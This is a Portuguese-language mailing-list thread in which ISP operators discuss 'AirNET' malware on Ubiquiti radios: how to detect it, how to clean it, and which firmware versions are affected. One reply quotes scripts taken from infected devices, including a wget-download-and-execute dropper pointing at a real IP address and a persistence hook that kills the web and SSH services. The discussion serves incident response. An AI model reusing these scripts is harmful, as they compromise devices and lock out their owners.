[GTER] RES: Vírus ubnt

Thu Oct 13 11:06:17 -03 2016

Alexandre, conseguiu identificar pra qual senha/usuario ele altera? Ou é
aleatório?

Em 13 de outubro de 2016 10:51, Márcio Elias Hahn do Nascimento <
marcio at sulonline.net> escreveu:

>
>
> Obrigado pelas informações Alexandre.
>
> Realmente não tive nenhum
> equipamento com esse problema.
>
> Versões entre 4x (equipamentos beem
> antigos antes da linha MiMo, poucos, mais tem...) e todos os tipos de
> 5.x (embora a grande maioria seja 5.6.6).
>
> Detalhe.
>
> Todas as portas
> entre 0-1024 estão fechadas para o mundo e abertas apenas para uma rede
> de gerência.
>
> ---
>
> Att
>
> Márcio Elias Hahn do Nascimento
> (48) 8469-1819
> / 3524-0700 - marcio at sulonline.net
> INOC-BR: 52977*100
> GERÊNCIA DE
> RECURSOS DE TIC - Sul Internet [5]
>
>  [5]
>
> Em 13/10/2016 10:21,
> Alexandre J. Correa (Onda) escreveu:
>
> > no /etc/persistent/ deve conter
> alguns arquivos, por exemplo o rc.poststart
> >
> > que contem:
> >
> >
> owned() {
> > sleep 10
> > kill -HUP 1 1>/dev/null 2>/dev/null
> > kill -9
> `pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
> > }
> >
> >
> /var/etc/persistent/AirNET init
> > ( owned ) &
> >
> > há um arquivo chamado
> porra.sh também, que é por onde ele baixa o 'kit'
> > e executa a
> instalação:
> >
> > #!/bin/sh
> >
> > rm -rf /tmp/AirNET*
> > wget -q
> http://5.196.50.44/mips/AirNET.tgz [4]-O /tmp/AirNET.tgz
> > if [ -f
> "/tmp/AirNET.tgz" ]; then
> > mkdir -p /tmp/AirNET
> > tar xzf
> /tmp/AirNET.tgz -C /tmp/AirNET
> > rm -rf /tmp/AirNET.tgz
> > cd
> /tmp/AirNET
> > sh install.sh
> > else
> > echo "error: wget"
> > fi
> > rm -rf
> /tmp/AirNET*
> >
> > Esta variante o desenvolvedor foi mais inteligente,
> ele compilou o
> > daemon, dificultando a identificação do que ele faz...
> consegui
> > decodificar e ele entra em uma rede de IRC e provavelmente
> recebe
> > comandos pelo IRC mesmo. Imagino que o cara deva ter uma
> botnet grande !!!
> >
> > Em 13/10/2016 09:56, Márcio Elias Hahn do
> Nascimento escreveu:
> >
> >> Pessoal, a discussão está muito dispersa e
> com muitas informações desencontradas. Qual a assinatura desse vírus?
> (como eu digo que um equipamento está ou não infectado? Arquivos
> alterados/criados, perda de acesso, alteração de portas, etc). O ideal
> seria um posicionamento definitivo sobre isso. Outra, sobre a versão
> segura ou não, é utopia, segurança da informação não existe a nível de
> 100%, então chego a 2 conclusões. 1 - Não vou sair atualizando milhares
> de equipamentos. 2 - Vou tratar de fechar a porta para não entrar quem
> não deve. --- Att Márcio Elias Hahn do Nascimento (48) 8469-1819 /
> 3524-0700 - marcio at sulonline.netINOC-BR: 52977*100 GERÊNCIA DE RECURSOS
> DE TIC - Sul Internet [3] [3] Em 13/10/2016 08:43, Adriano B. Lima
> escreveu:
> >>
> >>>> Há um novo virus, chamado AirNET, ele consegue
> capturar as senhas
> >> digitadas.. e utliza além da senhas padrões, as
> senhas capturadas para acesso aos radios.. ele bloqueia ssh e web...
> somente reset para remover... Fwd: a
> >>
> >>> Alexandre, resetando o
> equipamento limpa este
> >> vírus ou é preciso algum procedimento de
> remoção? Outra pergunta, as versões 5.6.9 também estão
> alexandre at onda.net.br> escreveu:
> https://eng.registro.br/mailman/listinfo/gter[1] -- gter list
> http://www.sulinternet.net [3] -- gter list
> https://eng.registro.br/mailman/listinfo/gter [2]
> >>
> >>>
> >
> > --
> >
> Fwd: a
> >
> > *Alexandre Jeronimo Correa* / CEO
> > _alexandre at onda.net.br
> <mailto:alexandre at onda.net.br>_ / Office +55 34
> > 3351 - 3077
> >
> >
> *ONDA INTERNET*
> > +55 34 3351-3077
> > Av. Benedito Valadares, 217 -
> Centro - Sacramento - MG - BR
> > _http://www.onda.net.br
> <http://www.onda.net.br/ [1]>_
> >
> > --
> > gter list
> https://eng.registro.br/mailman/listinfo/gter [2]
>
>
> Links:
> ------
> [1]
> http://www.onda.net.br/
> [2]
> https://eng.registro.br/mailman/listinfo/gter
> [3]
> https://eng.registro.br/mailman/listinfo/g<div>
>
> > ng.registro.br/mailman/listinfo/gter"&
> gt;https://eng.registro.br/mailman/listinfo/gter [2] http://ww
> </div>/</a>[3]<ahref=
> [4]
> http://5.196.50.44/mips/AirNET.tgz
> [5] http://www.sulinternet.net
> --
> gter list    https://eng.registro.br/mailman/listinfo/gter
>

-- 
Emerson Araujo